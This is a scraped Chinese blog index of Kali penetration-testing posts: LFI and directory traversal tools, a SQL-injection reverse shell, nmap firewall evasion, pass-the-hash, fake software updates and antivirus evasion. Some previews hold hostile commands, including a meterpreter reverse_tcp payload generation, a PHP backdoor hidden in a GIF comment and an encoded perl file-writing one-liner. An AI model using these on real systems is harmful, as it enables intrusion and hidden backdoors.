kali
文章平均质量分 50
iteye_16188
这个作者很懒,什么都没留下…
展开
-
Wine中使用MinGW
原文:[url]http://null-byte.wonderhowto.com/forum/set-up-mingw-kali-using-wine-0159622/[/url][url]http://blog.gojhonny.com/2014/03/installing-mingw-gcc-g-on-kali-linux-to.html[/url]MinGW是一组window开发...原创 2015-03-17 00:49:18 · 261 阅读 · 0 评论 -
目录遍历漏洞小结
1. 首先使用dotdotpwn发现漏洞2. 如果存在,则使用Panoptic搜集有用信息原创 2014-11-04 23:32:25 · 320 阅读 · 0 评论 -
Panoptic--使用LFI信息收集
Panoptic的原理是通过LFI漏洞来搜索通用文件来进行信息收集下载:[code="java"]git clone https://github.com/lightos/Panoptic.git[/code]或[code="java"]wget https://github.com/lightos/Panoptic/archive/master.zip[/code]运行程序:...原创 2014-11-03 01:24:00 · 134 阅读 · 0 评论 -
[译]通过SQLi获得逆向shell
原文地址:http://resources.infosecinstitute.com/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/本文使用DVWA作为演示首先将dvwa安全级别配置为low[img]http://dl2.iteye.com/upload/attachment/0102/7196/98ac5c...原创 2014-11-01 20:22:47 · 189 阅读 · 0 评论 -
Webscarab特点
原文:https://www.owasp.org/index.php/Category:OWASP_WebScarab_Projectkali中已存在该软件[b]分片-[/b]当web数据流通过代理或插件的时候,可以从html页面中抽取脚本和html注释。[b]代理-[/b]观察浏览器和web服务器之前的通信。WebScarab可以窥探HTTP和HTTPS数据流,通过在WebS...原创 2014-10-31 01:16:01 · 244 阅读 · 0 评论 -
arachni编译
[b]安装:[/b][code="xml"]apt-get install build-essential curl libcurl3 libcurl4-openssl-dev ruby ruby-devgem install rakeapt-get install libssl-devgit clone git://github.com/Arachni/arachni.git...原创 2014-10-29 02:03:30 · 203 阅读 · 0 评论 -
nmap扫描阶段
nmap扫描阶段:1. scrip pre-scanning:只有当使用-sC或--script选项时执行,它尝试通过一组NSE脚本来获得host的额外信息。2. target enumeration:nmap解析目标机,解析成IP地址3. host discovery:通过指定的主机发现技术来决定目标是否在线,-Pn选项可以用来跳过该阶段。4. reverse DNS:本阶段,n...原创 2014-10-27 22:51:09 · 225 阅读 · 0 评论 -
Kali中使用nslookup
支持下面的记录类型:- SOA : Start of Authority. Defines the zone name, an e-mail contact and various time and refresh values applicable to the zone.- A : the IPv4 address that belongs to machine name- AAA...原创 2014-10-23 00:00:08 · 1153 阅读 · 0 评论 -
[译]Joomla安全扫描
原文地址:http://resources.infosecinstitute.com/penetration-testing-in-cms/Joomla 安全扫描器用于发现Joomla的sqli,命令执行漏洞[b]Joomla扫描器特点[/b]1. 版本发现2. 基于Joomla的防火墙发现3. 扫描Joomla和它的组件的已知漏洞4. 生成Text&HTML报告5. ...原创 2014-10-21 00:36:24 · 148 阅读 · 0 评论 -
[译]nmap绕过防火墙
原文地址:http://resources.infosecinstitute.com/nmap-evade-firewall-scripting/[color=blue]TCP ACK Scan (-sA)[/color]发送ACK数据报比发送SYN数据包更好,因为如果远端主机存在主动防火墙,那么由于防火墙对于ACK数据报不产生log,因为防火墙把ACK数据包当成SYN数据包的应答。TCP...原创 2014-10-17 00:45:18 · 4886 阅读 · 0 评论 -
使用EvilGrade注入假更新
通常软甲更新过程:软件开始更新过程,然后尝试从dns服务器获取IP信息(例如update.notepadplus.com)。dns返回响应信息。软件从update.app1.com获取lastupdate.xml文件分析是否有更新。如果有,则安装之。[img]http://dl2.iteye.com/upload/attachment/0101/8853/98f8dc50-88e5-3...原创 2014-10-12 00:51:37 · 323 阅读 · 0 评论 -
使用climber进行安全检查
climber:Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalationclibmer是一个自动审计工具,用来检查UNIX/Linux系统是否含有可以导致提权的错误配置。可以进行本机审计以及远程主机审计。一)安装1)安装...原创 2014-10-10 13:37:17 · 144 阅读 · 0 评论 -
w3af扫描DVWA中sql漏洞
使用burp拦截请求,删除请求中[code="xml"]GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1Host: 192.168.59.142[/code][color=blue]root@kali:~# cat w3af.txt[/color]User-Agent: Mozilla/5.0 (X11; Linux x86...原创 2014-10-10 10:25:11 · 725 阅读 · 0 评论 -
[译]dotdotpwn使用
原文地址:https://github.com/wireghoul/dotdotpwn/blob/master/EXAMPLES.txt[b]= HTTP Module[/b][code="java"]./dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s[/...原创 2014-11-05 21:26:29 · 415 阅读 · 0 评论 -
DotDotPwn的https模式
参考:[url]http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/[/url][url]https://www.stunnel.org/howto.html[/url]使用stunnel程序,stunnel参考[url]https://www.stunnel.org/index...原创 2014-11-05 22:26:06 · 169 阅读 · 0 评论 -
chm文件转换成pdf 文件
apt-get install chm2pdfchm2pdf --book example.chm example.pdf原创 2014-11-06 01:02:30 · 913 阅读 · 0 评论 -
linux install firefix&plugin
1. download firefox&plugins2. tar vxf Firefox-latest-x86_64.tar.bz23. tar vxf install_flash_player_11_linux.x86_64.tar.gz4. cp install_flash_player_11_linux.x86_64.tar.gz /usr/lib/mozilla/plugin...原创 2015-01-22 20:56:28 · 107 阅读 · 0 评论 -
gitrob--github信息收集
原文地址:[url]http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/[/url]简介[quote]Gitrob is a command line tool that can help organizations and security professionals find such sen...原创 2015-01-17 00:36:05 · 505 阅读 · 0 评论 -
合并gif和php文件
1. apt-get install gifsicle[img]http://dl2.iteye.com/upload/attachment/0104/9012/e8938c40-c47e-360b-aeea-2e29790e36bf.png[/img]2. gifsicle –comment "`tr '\n' ' ' < simple-backdoor.php`" < hehe...原创 2015-01-04 23:07:53 · 161 阅读 · 0 评论 -
kaili 1.09安装问题解决
本人采用的安装方法是1. 在VMware中安装1.09 Kali2. 将硬盘插入移动硬盘盒,usb插入,连接虚拟机3. dd if=/dev/sda of=/dev/sdb bs=16k4. sync5. eject然后硬盘就做好了,将硬盘装入电脑中,启动电脑这是出现硬盘坏点错误,不能启动图形界面提示输入root密码进行硬盘检查这时输入root密码然后fsc...原创 2014-12-28 14:10:28 · 126 阅读 · 0 评论 -
[译]剪切粘贴二进制文件
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/12/10/awkward-binary-file-transfers-with-cut-and-paste[/url][b]Step 1 压缩源文件[/b][quote][color=blue]root@kali:~# gzip /bin/nc.traditio...原创 2014-12-17 01:20:45 · 363 阅读 · 0 评论 -
kali更新exploit-db
[code="java"]cd /usr/share/exploitdbwget http://www.exploit-db.com/archive.tar.bz2tar -xvjf archive.tar.bz2rm archive.tar.bz2[/code]原创 2014-12-12 01:08:06 · 1235 阅读 · 0 评论 -
使用Tesseract 识别验证码
参考:[url]http://code.google.com/p/tesseract-ocr/[/url][url]https://stackoverflow.com/questions/2363490/limit-characters-tesseract-is-looking-for[/url][url]http://resources.infosecinstitute.com/ca...原创 2014-12-10 00:48:23 · 83 阅读 · 0 评论 -
使用apt-fast加速Ubuntu软件安装
apt-get是Ubuntu常用的软件安装和更新命令但是它使用单个连接来下载文件。所以产生了apt-get的替换命令apt-fast。安装:[code="java"]1. sudo apt-get install axel2. 从http://www.mattparnell.com/linux/apt-fast/下载脚本3. sudo mv ~/Downloads/apt-fast...原创 2014-12-02 01:21:54 · 102 阅读 · 0 评论 -
[译]通过认证的SMB Sessions攫取信息
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions通过SMB,可以远程获得共享文件,注册表,服务,域认证以及更多信息。Linux下进行Windows SBM访问的工具之一是rpcclient。...原创 2014-11-20 02:06:50 · 251 阅读 · 0 评论 -
[译]命令行连接wifi
原文地址:http://www.blackmoreops.com/2014/09/18/connect-to-wifi-network-from-command-line-in-linux/[b]需要的工具[/b]wpa_supplicant[url]http://w1.fi/wpa_supplicant/[/url]iw[url]http://wireless.kernel.or...原创 2014-11-20 01:34:42 · 392 阅读 · 0 评论 -
[译]网络渗透测试及其,工具及资源
原文地址:http://pen-testing.sans.org/blog/pen-testing/2013/11/21/network-pen-testing-tips-tricks-tools-resources[color=blue][b]方法[/b][/color]侦查--大多数会跳过或缺少的步骤。毫无疑问,这是最重要的一步。如果做得好,可以不使用任何exploit就可以获得访...原创 2014-11-19 02:06:31 · 202 阅读 · 0 评论 -
kali更新源
[code="xml"]1. cat > /etc/apt/sources.listdeb http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali main non-free contribdeb http://mirrors.ust...原创 2014-11-12 19:37:57 · 67 阅读 · 0 评论 -
[译]web认证攻击(一)
原文:http://resources.infosecinstitute.com/authentication-hacking-pt1/认证是识别某个事物的真伪。当一个web客户请求服务器的某个资源的时候,有时服务器可能需要识别用户的身份。因此用户必须体用一些口令以及web服务器来识别它,然后根据user的口令来采取相应的措施。这个过程叫做认证。一旦用户通过认证了,web服务器根据user相应...原创 2014-10-09 09:43:29 · 401 阅读 · 0 评论 -
Metasploit PSExec Pass The Hash
原文:http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hashpsexec被渗透测试者用来获得一个已知口令的系统访问权。作为一个渗透测试者,当我们通过漏洞成功获取一个系统访问权后,使用meterpreter来获得密码,或者通过fgdump, pwdump, cachedump和彩虹表来配合破解这些ha...原创 2014-10-03 01:18:55 · 377 阅读 · 0 评论 -
使用Metasm来绕过杀毒软件
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary2.拷贝metasm.rb文件和metasm文件夹到rub...原创 2014-09-30 20:59:40 · 428 阅读 · 0 评论 -
使用XSScrapy扫描xss漏洞
url:http://danmcinerney.org/xsscrapy-fast-thorough-xss-vulnerability-spider/1. apt-get install python-pip2. pip install scrapy3. pip install ipythog4. pip install pybloom5. git clone https...原创 2014-08-23 10:53:11 · 566 阅读 · 0 评论 -
Linux下解压rar文件
unrar -e file.rar原创 2014-08-20 22:40:22 · 83 阅读 · 0 评论 -
使用nmap扫描heartbled
1. wget http://nmap.org/svn/scripts/ssl-heartbleed.nse2. wget http://nmap.org/svn/nselib/tls.lua3. cp ssl-heartbleed.nse /usr/bin/../share/nmap/scripts/4. cp tls.lua /usr/bin/../share/nmap/nseli...原创 2014-08-13 00:33:06 · 721 阅读 · 0 评论 -
openvas in msf
1. 创建管理员 root@kali:~# openvasad -c 'add_user' -n admin -r 'Admin' Enter password: ad main:MESSAGE:4246:2014-08-10 02h39.54 UTC: No rules file provided, the new user will have no ...原创 2014-08-10 11:06:28 · 132 阅读 · 0 评论 -
metasploit 连接数据库方法
1. /etc/init.d/postgres start2. su postgres3. psql4. alter user postgres with password '111111';5. CREATE DATABASE pentest WITH ENCODING = 'SQL_ASCII';6. 退出postgres,使用msfconsole db_connect...原创 2014-08-09 22:50:48 · 168 阅读 · 0 评论 -
snmp assets
Part 1:setup snmp serviceref: http://resources.infosecinstitute.com/vulnerability-assessment-of-snmp-service-i/1. ifconfig2. ping baidu.com3. apt-get install snmpd4. vim /etc/snmp/snmpd.con...原创 2014-07-09 23:10:03 · 102 阅读 · 0 评论 -
metasploit+postgres using kali
>service postgresql start>service metasploit start>su postgres>createuser msf -P Enter password for new role: yourmsfpassword Enter it again: yourmsfpassword Shall the new role be a supe...原创 2014-07-07 23:48:22 · 58 阅读 · 0 评论 -
perl -e
>>[b][color=red]perl -e[/color][/b] "print chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109...原创 2014-06-25 23:25:10 · 241 阅读 · 0 评论 -
exiftool
>>exiftool "-comment原创 2014-06-20 00:27:53 · 381 阅读 · 0 评论